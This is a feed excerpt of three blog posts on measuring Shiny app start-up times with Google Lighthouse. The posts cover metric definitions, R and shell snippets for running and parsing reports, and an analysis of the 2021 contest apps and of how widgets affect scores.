&lt;li&gt;SI (Speed Index - ms)&lt;/li&gt;
&lt;li&gt;LCP (Largest Contentful Paint - ms)&lt;/li&gt;
&lt;li&gt;TTI (Time to Interactive - ms)&lt;/li&gt;
&lt;li&gt;TBT (Total Blocking Time - ms)&lt;/li&gt;
&lt;li&gt;CLS (Cumulative Layout Shift)&lt;/li&gt;
&lt;li&gt;Score&lt;/li&gt;
&lt;/ul&gt;
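&lt;p&gt;For anyone wanting to collect these metrics themselves, here is a minimal sketch of pulling them out of a parsed Lighthouse JSON report in R. It is not the code used for this post. The audit ids are my assumption about the report layout and may differ between Lighthouse versions, and &lt;code&gt;extract_metrics()&lt;/code&gt; is a hypothetical helper.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumed mapping from the abbreviations above to Lighthouse audit ids
metric_ids = c(
  FCP = "first-contentful-paint",
  SI  = "speed-index",
  LCP = "largest-contentful-paint",
  TTI = "interactive",
  TBT = "total-blocking-time",
  CLS = "cumulative-layout-shift"
)

# Pull the raw metric values and the overall score out of one parsed report
extract_metrics = function(report) {
  values = vapply(
    metric_ids,
    function(id) as.numeric(report$audits[[id]]$numericValue),
    numeric(1)
  )
  # The performance score is stored on a 0-1 scale, so rescale it to 0-100
  c(values, Score = report$categories$performance$score * 100)
}

# report = jsonlite::fromJSON("data/output_file.json", simplifyVector = FALSE)
# extract_metrics(report)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Calling this once per report and binding the rows together gives one row per run, which is the shape needed for the plots that follow.&lt;/p&gt;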
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-lighthouse-3"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="histogram-showing-all-metrics-measured-in-the-lighthouse-report"&gt;Histogram showing all metrics measured in the Lighthouse report&lt;/h3&gt;
&lt;p&gt;To get a feel for the data obtained, here is a histogram for each of the metrics reported by Lighthouse across the different apps:&lt;/p&gt;
&lt;img src="img/histogram.png" alt="Histogram showing all metrics measured in the Lighthouse report" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;With this we can see the spread of scores in each metric. This plot gave me a good idea of how to further explore the data.&lt;/p&gt;
&lt;h3 id="time-to-interactive-vs-speed-index"&gt;Time to Interactive vs Speed Index&lt;/h3&gt;
&lt;img src="img/timetointeractive-speedindex.png" alt="Scatter plot showing increases in Lighthouse scores as the apps become more complex" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;In this scatter plot of TTI (Time to Interactive - ms) vs SI (Speed Index - ms), we can see the times increasing with each iteration of the app. There is a two-fold difference in TTI between the simplest and the most-complex apps. We can see groupings in the data like {app1}, {app2, app3} and {app4, app5, app6}. This suggests that the first {plotly} graph and the {DT} data table are the most influential components.&lt;/p&gt;
&lt;h3 id="boxplot-of-app-vs-speed-index"&gt;Boxplot of App vs Speed Index&lt;/h3&gt;
&lt;img src="img/boxplot.png" alt="Boxplot of app vs speed index" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;This box plot of app vs speed index shows that as we iterate on the app it&amp;rsquo;s not just the loading times that increase but the variability in loading times as well.&lt;/p&gt;
&lt;h3 id="score-vs-first-contentful-paint"&gt;Score vs First Contentful Paint&lt;/h3&gt;
&lt;img src="img/score-fcp.png" alt="Scatter plot showing the relationship between score and first contentful paint." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Here the more complex apps have slight decreases in overall Lighthouse score as the time for first contentful paint increases.
Those complex apps also show a wide variability in the overall score. Some runs for an app gained a &amp;ldquo;Good&amp;rdquo; user experience
rating (90+) and others a &amp;ldquo;Needs Improvement&amp;rdquo; rating (50-89). The first contentful paint scores were relatively constant for a given app,
so I investigated why the difference of 10 score points arose for those apps.&lt;/p&gt;
&lt;h3 id="different-lighthouse-scores-from-the-same-app"&gt;Different Lighthouse Scores From the Same App&lt;/h3&gt;
&lt;p&gt;I mentioned in the last blog that you can get different Lighthouse scores across runs and suggested doing a few reports to get the best results (I included some information on why this might be in &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;part 2&lt;/a&gt;). I now have some evidence of it happening and I want to see why the exact same app can go from a Lighthouse score in the high 80s to one in the high 90s. Of the 60 app tests I did, 9 had sub 90 scores, all of them from apps 4 and 5.&lt;/p&gt;
&lt;h4 id="radar-plot"&gt;Radar plot&lt;/h4&gt;
&lt;img src="img/radar.png" alt="Radar plot showing the difference in mean scores between the sub 90 apps and their counterparts." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;This radar plot compares the mean scores for the apps with Lighthouse scores over 90 vs the ones without. 0% represents the lowest score I recorded for a metric and 100% represents the highest. We can see the sub 90 apps have performed noticeably worse (higher times in each metric, bar score where higher is better), particularly in cumulative layout shift. This metric measures movements in the layout of a page. A good example is clicking a button before a page has fully loaded, only for the page to move so that you click the wrong thing. A better explanation is &lt;a href="https://web.dev/articles/cls" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="score-vs-fetch-time"&gt;Score vs Fetch Time&lt;/h4&gt;
&lt;img src="img/score-fetchtime.png" alt="Scatter plot showing the time reports took to make and the time they were run. We can also see the score received and which app." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;It seemed odd that there was such a big difference between different runs of the same apps, and also that the &lt;em&gt;most&lt;/em&gt; complex app
(app6) wasn&amp;rsquo;t affected in the same way. What else could explain why app4 and app5 had these poor runs?&lt;/p&gt;
&lt;p&gt;Perhaps the best explanation for this is a drop in my network speed during the runs&amp;hellip;&lt;/p&gt;
&lt;p&gt;If we look at the overall scores for the Lighthouse runs against the time when the run was started, there is a clump of sub 90
scores between 15:21 and 15:25. This plot looks very similar to the score vs speed index earlier. I do not have data about my
network speed at the time of running the apps, but it looks like there was a dip in network speed at this time. This is backed up
by the fact the sixth app has no sub 90 score despite being the most complex.&lt;/p&gt;
&lt;p&gt;So even when your app works well, factors beyond your control may affect your Lighthouse results.&lt;/p&gt;
&lt;h3 id="final-words"&gt;Final Words&lt;/h3&gt;
&lt;p&gt;At our &lt;a href="https://shiny-in-production-2023.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference in October our final keynote speaker,
the data visualisation expert &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt;, was asked about her thoughts on interactive visualisations
in Shiny apps and in the ensuing discussion &lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andrie de Vries&lt;/a&gt; from &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;
mentioned that {plotly} plots add about a second of loading time each to an app.&lt;/p&gt;
&lt;p&gt;Overall the results are pretty straightforward: adding more widgets to your Shiny app is going to slow it down. We can clearly see that adding interactive elements such as {plotly} plots and {DT} tables to your apps will slow them down. I&amp;rsquo;m not going to recommend not using them, because they don&amp;rsquo;t add that much time if you use them sensibly. One of the main points of Shiny is interactivity after all - you may as well have a markdown report otherwise.&lt;/p&gt;
&lt;p&gt;That being said, don&amp;rsquo;t have a hundred plotlys in your app, because it will be slow. By all means, put a {plotly} in because it &amp;ldquo;looks cool&amp;rdquo; but just remember you are sacrificing a little bit of performance. At the same time maybe think twice about putting a widget when something static would be better for the user.&lt;/p&gt;
&lt;p&gt;Retrospectively I wish I had made a few more apps with more interactive content and tried some interactive maps,
as I imagine that maps would have a big impact on load times. Why not just add more apps to this analysis and
generate more reports? The 60 Lighthouse reports that were covered here were run consecutively on the same day.
Including additional Lighthouse reports after those initial reports may introduce extra complications to the
analysis, due to internet speed variability, updates to Lighthouse etc.&lt;/p&gt;
&lt;p&gt;All being said, Lighthouse is just one tool for assessing the user-experience of your app, and it won&amp;rsquo;t tell you if your app is &amp;ldquo;good&amp;rdquo; or not. Having a fast and efficient app is important for usability, but how enjoyable and easy it is to use are more important for users. This type of feedback is only going to be obtained via user testing and asking users what they are gaining from your app.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Analysing Shiny App start-up Times with Google Lighthouse</title><link>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/</link><pubDate>Thu, 07 Dec 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of a three-part series on Lighthouse for Shiny Apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;Using Google Lighthouse for Web Pages&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Analysing Shiny App start-up Times with Google Lighthouse (This post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/" rel="external"&gt;Effect of Shiny Widgets with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="intro"&gt;Intro&lt;/h3&gt;
&lt;p&gt;In the last blog I spoke about using &lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt; to test the speed of web pages. I wanted to build upon that and use Lighthouse to test some Shiny apps.&lt;/p&gt;
&lt;p&gt;To get a feel for Shiny&amp;rsquo;s performance in a Lighthouse analysis, I needed a lot of Shiny
apps that I could test and create a dataset from, so I used the entries to the
&lt;a href="https://posit.co/blog/time-to-shiny/" rel="external"&gt;2021 Shiny app contest&lt;/a&gt;,
which is a competition where people enter Shiny apps to be judged on technical merit
and artistic achievement. I used the 2021 apps as there has unfortunately not been a
competition since. A full list of the submissions can be found on the
&lt;a href="https://community.rstudio.com/tags/c/shiny/shiny-contest/30/shiny-contest-2021" rel="external"&gt;Posit Community website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To actually obtain data from these apps I used
&lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt; in the
same way I described for general web pages in the &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;previous blog&lt;/a&gt; in this series. This
generated a Lighthouse report for each app.&lt;/p&gt;
&lt;h3 id="google-lighthouse"&gt;Google Lighthouse&lt;/h3&gt;
&lt;p&gt;Testing a single app from the contest was exactly the same as testing a normal webpage. I simply ran:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;lighthouse --output json --output-path data/output_file.json url
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Where &lt;code&gt;url&lt;/code&gt; is the app I&amp;rsquo;m testing. You can also test in browser using devtools
(as demonstrated in the last blog), but I was testing a lot of apps so I needed to do it programmatically.&lt;/p&gt;
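&lt;p&gt;One way to script this from R is sketched below. It is only an illustration and not the code I actually used: the helper names and the report file naming are made up, and it assumes the &lt;code&gt;lighthouse&lt;/code&gt; command is installed and on the PATH.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Build the command-line arguments shown above for one URL
lighthouse_args = function(url, output_path) {
  c("--output", "json", "--output-path", shQuote(output_path), shQuote(url))
}

# Run Lighthouse for every URL, writing one JSON report per app
run_lighthouse = function(urls, out_dir = "data") {
  for (i in seq_along(urls)) {
    output_path = file.path(out_dir, paste0("report_", i, ".json"))
    system2("lighthouse", lighthouse_args(urls[i], output_path))
  }
}

# run_lighthouse(c("https://example.com/app1", "https://example.com/app2"))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Quoting the URL with &lt;code&gt;shQuote()&lt;/code&gt; protects characters in query strings that would otherwise be interpreted by the shell.&lt;/p&gt;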
&lt;p&gt;Before we get into the data it&amp;rsquo;s important to point out that Google Lighthouse scores do vary; you may run a report on an app that I&amp;rsquo;ve covered and get a different score. There are a number of reasons for this &lt;a href="https://developer.chrome.com/en/docs/lighthouse/performance/performance-scoring/#fluctuations" rel="external"&gt;covered here&lt;/a&gt;, so the devs recommend running multiple tests. I&amp;rsquo;d also like to point out I have only run the report once for each app due to length of time it would take to run reports on all the apps a few times.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-contest"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="app-data"&gt;App data&lt;/h3&gt;
&lt;p&gt;The entries to the 2021 Shiny app contest were great, with loads of unique and interesting apps.
Given it was 2021, there were plenty of COVID- and election-related apps. I ran Lighthouse reports locally on
268 of the Shiny app contest submissions (some of the links were broken), and have compiled a few
plots to summarise the performance of the apps.&lt;/p&gt;
&lt;p&gt;Below is a histogram showing the distribution of overall performance scores for the
apps. The Lighthouse docs give the following advice for apps based on performance scores:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;90-100 is an app with good performance;&lt;/li&gt;
&lt;li&gt;50-89 is an app that needs some improvement;&lt;/li&gt;
&lt;li&gt;and 0-49 is an app with poor performance.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As we can see many of the apps (79 / 268) have good performance, whereas the bulk of the apps are in need of some improvement (149 / 268) or have poor overall performance (40 / 268).&lt;/p&gt;
&lt;img src="images/score_hist.png" alt="Distribution of overall scores for the apps, with the mean score of 73.2 marked." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
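&lt;p&gt;The bands listed above are easy to apply to a vector of scores in R. Here is a minimal sketch using &lt;code&gt;cut()&lt;/code&gt;. The function name &lt;code&gt;score_band()&lt;/code&gt; and the example scores are made up for illustration, and this is not necessarily how the counts above were produced.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assign each Lighthouse performance score (0-100) to its band
score_band = function(score) {
  cut(score,
      breaks = c(0, 49, 89, 100),
      labels = c("poor", "needs improvement", "good"),
      include.lowest = TRUE)
}

# Count how many (made-up) scores fall in each band
table(score_band(c(35, 62, 88, 90, 97)))
&lt;/code&gt;&lt;/pre&gt;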
&lt;p&gt;We can dive deeper into the distribution of the raw values that are used in
calculating the overall performance score. The performance score is a weighted sum
of some metrics formed from these raw (time) values - see the
&lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;previous blog&lt;/a&gt; for
more details on what each of these metrics means. The scores follow a similar
trend - most of the measurements fall on the faster side of the spectrum then
decrease as the time increases. I think this was to be expected based on the
distribution of the performance score seen earlier, as most of the apps scored
pretty well.&lt;/p&gt;
&lt;img src="images/metrics.png" alt="App metric scores for six different metrics: Cumulative Layout Shift, First Contentful Paint, Largest Contentful Paint, Speed Index, Time to Interactive, Total Blocking Time. The plots are histograms of the time taken to each stage." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h3 id="the-apps"&gt;The Apps&lt;/h3&gt;
&lt;p&gt;I don&amp;rsquo;t highlight any of the apps on the lower end of the performance spectrum here, as
it would be unfair on the creators. The Shiny app contest has two sections, one for &amp;lt; 1
year&amp;rsquo;s experience and another for &amp;gt; 1 year&amp;rsquo;s experience, so people new to Shiny are
likely to have been experimenting with what&amp;rsquo;s possible in an app and not focusing on
performance.&lt;/p&gt;
&lt;p&gt;That being said, I&amp;rsquo;d like to reiterate what Colin Fay said in his talk &lt;a href="https://www.youtube.com/watch?v=8_k-iPwcleU" rel="external"&gt;&amp;ldquo;Destroy All Widgets&amp;rdquo;&lt;/a&gt;
about being sensible with widget use within apps: widgets can hinder performance and increase wait times, and they are
not always necessary. For instance, do you really need a {plotly} plot or would a ggplot suffice? The same could be said about interactive data tables.&lt;/p&gt;
&lt;p&gt;I will highlight a couple of high scoring apps:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://rabiibouhestine.shinyapps.io/wonderguesser/" rel="external"&gt;This app&lt;/a&gt; by Rabii Bouhestine is a really cool Geoguessr-esque game where you are trying to pinpoint the location of world wonders. This app received an overall Lighthouse score of 95!&lt;/p&gt;
&lt;img src="images/guesser.png" alt="WorldGuesser app screenshot" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Another high scoring app is &lt;a href="https://parmsam.shinyapps.io/MixThingsUp/" rel="external"&gt;&amp;ldquo;Mix Things Up&amp;rdquo; by Sam Parmar&lt;/a&gt;,
a previous competition winner who was a judge on the 2021 contest. This app is a simple yet efficient
way to generate random workouts.&lt;/p&gt;
&lt;img src="images/exercise.png" alt="Exercise app screenshot" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;The last one I&amp;rsquo;m going to highlight is
&lt;a href="https://desarrolloaplicaciones.shinyapps.io/videowall_english_version/" rel="external"&gt;this app&lt;/a&gt; by
Edgar Cáceres, which is an app for visualising air quality data from the station in La
Oroya, Junin, Peru. This app is particularly impressive in its scores as it actually
has two interactive {leaflet} plots.&lt;/p&gt;
&lt;img src="images/air_qual.png" alt="Air quality app screenshot" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Google Lighthouse is a good starting point for testing the start-up times of your apps; however, it is worth noting that the score can be misleading.
An app may score very highly but not actually load fast for the user. This may happen, for example, if Lighthouse decides that the contentful
paints have completed when only the background of the app has rendered. A way to check this is to look at the screenshots in the Google Lighthouse report
within the browser. You can do this by adding &lt;code&gt;--view&lt;/code&gt; after the &lt;code&gt;url&lt;/code&gt; argument when running a test in the terminal. I will be using the next
blog in this series to investigate this further.&lt;/p&gt;
&lt;p&gt;So if you are developing a desktop Shiny app and want to see how it does, you can use Lighthouse and this blog as a benchmark, although with a pinch of salt as we tested many different kinds of apps, including games and data visualisations. Roughly, however, if your app scores better than 73 then that&amp;rsquo;s a good start. If you can&amp;rsquo;t bring your app load time down for whatever reason, perhaps due to data processing, then something you can do is use a loading screen to let your app users know that something is happening. This is covered excellently at the start of this &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/" rel="external"&gt;blog on Shiny extensions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In the final blog in this series, we will be investigating the impact various widgets have on Shiny app Lighthouse scores.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Using Google Lighthouse for Web Pages</title><link>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/</link><pubDate>Thu, 30 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of a three part series on Lighthouse for Shiny Apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Using Google Lighthouse for Web Pages (This post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;Analysing Shiny App start-up Times with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/" rel="external"&gt;Effect of Shiny Widgets with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="intro"&gt;Intro&lt;/h3&gt;
&lt;p&gt;This blog post was partly inspired by
&lt;a href="https://www.youtube.com/watch?v=8_k-iPwcleU" rel="external"&gt;Colin Fay&amp;rsquo;s talk &amp;ldquo;Destroy All Widgets&amp;rdquo;&lt;/a&gt; at our
&amp;ldquo;Shiny In Production&amp;rdquo; conference in 2022. In that talk, Colin spoke about HTML widgets and
highlighted how detrimental they can be to the speed of a Shiny app. Speaking of which, the next
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny In Production&lt;/a&gt; conference is taking place
on 9th and 10th of October 2024, and recordings for this year&amp;rsquo;s events are coming soon to our
&lt;a href="https://youtube.com/@jumping-rivers?si=DI-JS2Zf5gVsyMsS" rel="external"&gt;YouTube channel&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for the next installment of our Shiny in Production conference! For more details, check out our
&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;I wanted to see if I could measure the speed of a collection of Shiny apps. To do so, I was directed to
&lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt;, and this
blog is dedicated to the use and understanding of Lighthouse before I start using it on Shiny apps.&lt;/p&gt;
&lt;h3 id="google-lighthouse"&gt;Google Lighthouse&lt;/h3&gt;
&lt;p&gt;Google Lighthouse is an open source tool which can be used to test webpages (or web hosted apps
like Shiny apps). For a specified webpage, Lighthouse generates a report summarising several
aspects of that webpage. For Shiny, the most important aspects are summarised in the &amp;ldquo;Overall
Performance Score&amp;rdquo; and the &amp;ldquo;Accessibility Score&amp;rdquo;, with one of the best parts being the feedback given
by the report on how you can improve.&lt;/p&gt;
&lt;p&gt;Before you can use Lighthouse you must install it (and
&lt;a href="https://docs.npmjs.com/downloading-and-installing-node-js-and-npm" rel="external"&gt;npm&lt;/a&gt; if you don&amp;rsquo;t already have it):&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;npm install -g lighthouse
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Then to run a Google Lighthouse assessment in the command line you simply run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;lighthouse --output json --output-path data/output_file.json url
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Where you specify:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;em&gt;&lt;strong&gt;output format&lt;/strong&gt;&lt;/em&gt;: both json and csv are available; I used json as it stores more information.&lt;/li&gt;
&lt;li&gt;The &lt;em&gt;&lt;strong&gt;output path&lt;/strong&gt;&lt;/em&gt; for where you would like the data to be stored.&lt;/li&gt;
&lt;li&gt;The &lt;em&gt;&lt;strong&gt;url&lt;/strong&gt;&lt;/em&gt; of the Shiny app you would like to test (the location of your deployed app
or, if developing locally, the URL that Shiny prints out when the app starts:
&lt;code&gt;Listening on http://127.0.0.1:4780&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One cool feature of Lighthouse is that you can test apps in both desktop and mobile settings. The
default is mobile but you can specify desktop by adding &lt;code&gt;--preset desktop&lt;/code&gt; after the url argument.&lt;/p&gt;
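&lt;p&gt;The options described above can be combined in a single call. As a minimal sketch, the helper below (&lt;code&gt;lighthouse_desktop_cmd&lt;/code&gt; is a hypothetical name, not part of Lighthouse) only prints the command for a given URL and output path, so you can check it before running it yourself:&lt;/p&gt;

```shell
# Hypothetical helper (not part of Lighthouse): prints, but does not run,
# a desktop Lighthouse command for a given URL and JSON output path.
lighthouse_desktop_cmd() {
  url="$1"
  out="$2"
  printf 'lighthouse %s --preset desktop --output json --output-path %s\n' "$url" "$out"
}

# Example: inspect the command for a locally running Shiny app.
lighthouse_desktop_cmd http://127.0.0.1:4780 data/local_app.json
```

&lt;p&gt;Copying the printed line into the terminal runs the actual assessment; the port and output path here are placeholders.&lt;/p&gt;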
&lt;p&gt;When you run the command a new Chrome browser will open with the specified URL, where Lighthouse
will run the report. This browser will automatically be closed by Lighthouse when it is finished.
For all the Lighthouse demos in this blog I am going to use
&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;our website&lt;/a&gt; for consistency.&lt;/p&gt;
&lt;p&gt;Another way to access Lighthouse is to simply use it in a Chrome browser and open the DevTools panel,
as described in the
&lt;a href="https://developer.chrome.com/docs/lighthouse/overview/#devtools" rel="external"&gt;Chrome Developer documentation&lt;/a&gt;.
A Lighthouse tab should be visible in the &amp;ldquo;more tabs&amp;rdquo; section, where you can run performance checks interactively.&lt;/p&gt;
&lt;img src="images/lighthouse_devtools.png" alt="Lighthouse in browser. The image is a screenshot of the dev tools panel with the title 'Generate a Lighthouse report' and a button to 'Analyze page load', followed by some radio buttons to select different options, including whether you want to test for mobile or desktop devices - mobile is selected by default." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;From DevTools all you do is tick the boxes to specify the device type and performance metrics you want to assess. Then press &amp;ldquo;Analyze page load&amp;rdquo; to start the Lighthouse report generation.&lt;/p&gt;
&lt;h3 id="lighthouse-output"&gt;Lighthouse Output&lt;/h3&gt;
&lt;p&gt;Depending on how you&amp;rsquo;ve run the Lighthouse report, the way you access the results will be different. Firstly, if you have used the terminal and saved the Lighthouse output, you will have a csv or json file containing the data displayed in the report (the json output contains more in-depth data).&lt;/p&gt;
&lt;p&gt;Alternatively, from the terminal you can add &lt;code&gt;--view&lt;/code&gt; after the URL and the Lighthouse report will open in your browser once it is ready. Here is an example of this:&lt;/p&gt;
&lt;img src="images/jumpingviewrivers.png" alt="Lighthouse report in browser. The page shows four metrics at the top and their scores out of 100. Performance: 100, Accessibility: 100, Best Practices: 92, SEO: 100, PWA: No score shown. This is followed by a list of detailed metrics and a view of the page in question." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Lastly, if you have run Lighthouse through DevTools in a Chrome browser, the report will become
visible in the DevTools panel. Location aside, the report should look identical to the browser
version created with the &lt;code&gt;--view&lt;/code&gt; option. It should look similar to this:&lt;/p&gt;
&lt;img src="images/devtoolsresults.png" alt="Lighthouse report in browser. The same report as above is shown in the dev tools window split with the page in question. This time the metrics are as follows: Performance: 100, Accessibility: 96, Best Practices: 100, SEO: 100, PWA: No score shown." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;You may have noticed that I got different scores in the two screenshots even though I am using the same URL for both. This gives me a great opportunity to bring up one of the drawbacks of Lighthouse: the variability in results. For example, you could run a test on our website and get a different score again. There are a number of reasons for this, including internet or device performance and browser extensions, so the Lighthouse developers recommend running multiple tests. This topic is covered in more detail &lt;a href="https://developer.chrome.com/en/docs/lighthouse/performance/performance-scoring/#fluctuations" rel="external"&gt;here.&lt;/a&gt;&lt;/p&gt;
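&lt;p&gt;One common way to summarise repeated runs is to take the median score, which is less sensitive to a single unusually slow run than the mean. The sketch below assumes you have already collected the performance scores from several runs of the same page; the &lt;code&gt;median&lt;/code&gt; function and the five scores are made up for illustration:&lt;/p&gt;

```shell
# median: print the median of the numeric arguments.
median() {
  printf '%s\n' "$@" | sort -n | awk '
    { v[NR] = $1 }
    END {
      if (NR % 2) print v[(NR + 1) / 2]
      else print (v[NR / 2] + v[NR / 2 + 1]) / 2
    }'
}

# Hypothetical scores from five repeated runs of the same page.
median 92 100 96 89 97
```

&lt;p&gt;For these made-up scores the median is 96, even though individual runs ranged from 89 to 100.&lt;/p&gt;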
&lt;h3 id="lighthouse-performance-metrics"&gt;Lighthouse Performance Metrics&lt;/h3&gt;
&lt;p&gt;Lighthouse scores apps on 5 measures: Performance, Accessibility, Best Practices,
SEO (search engine optimization) and PWA (progressive web app).&lt;/p&gt;
&lt;p&gt;Here, we will look at the overall performance score. This is based on a weighted combination of
several different metrics. As of Lighthouse 10 (8 was slightly different) the score is made up of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;10% First Contentful Paint - This is the time from the page starting to load to when any part of the page&amp;rsquo;s content is rendered on the screen. &amp;ldquo;Content&amp;rdquo; can be text, images, &amp;lt;svg&amp;gt; elements or non-white &amp;lt;canvas&amp;gt; elements.&lt;/li&gt;
&lt;li&gt;10% Speed Index - This is how quickly the contents of a page are visibly populated.&lt;/li&gt;
&lt;li&gt;25% Largest Contentful Paint - This metric is the time between the page starting and the largest visible image or text block loading.&lt;/li&gt;
&lt;li&gt;30% Total Blocking Time - This is the total time, between first contentful paint and another metric called time to interactive, during which the main thread is blocked for long enough to stop the page responding to user input. Time to interactive measures how long the app takes to become interactive for the user.&lt;/li&gt;
&lt;li&gt;25% Cumulative Layout Shift - This is a measure of the largest layout shift which occurs during the lifespan of a page. A good explanation can be found &lt;a href="https://web.dev/cls/" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
